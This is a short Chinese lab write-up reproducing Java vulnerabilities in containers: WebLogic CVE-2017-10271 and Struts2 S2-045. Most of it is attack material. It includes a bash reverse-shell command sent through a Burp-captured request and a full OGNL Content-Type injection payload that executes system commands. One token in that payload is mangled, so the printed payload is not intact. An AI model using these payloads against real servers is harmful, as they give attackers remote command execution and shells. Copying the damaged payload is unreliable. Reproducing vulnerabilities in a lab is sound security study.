JAVA反序列化漏洞复现

Weblogic（CVE-2017-10271）

拉取容器

访问

http://192.168.142.151:7001/console/login/LoginForm.jsp

​

启动nacs

进行漏洞扫描

下载weblogicScanner工具

git clone https://github.com/0xn0ne/weblogicScanner.git 

 开始扫描

访问http://192.168.142.151:7001//wls-wsat/CoordinatorPortType

bp抓包，漏洞利用代码

/bin/bash


-c


bash -i >& /dev/tcp/10.0.0.1/21 0>&1

主机监听获得反弹shell

struts2/s2-045

拉取容器

可能会出现端口冲突问题，发现是bp占了8080，我是改了bp端口

POC

Content-Type:  %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}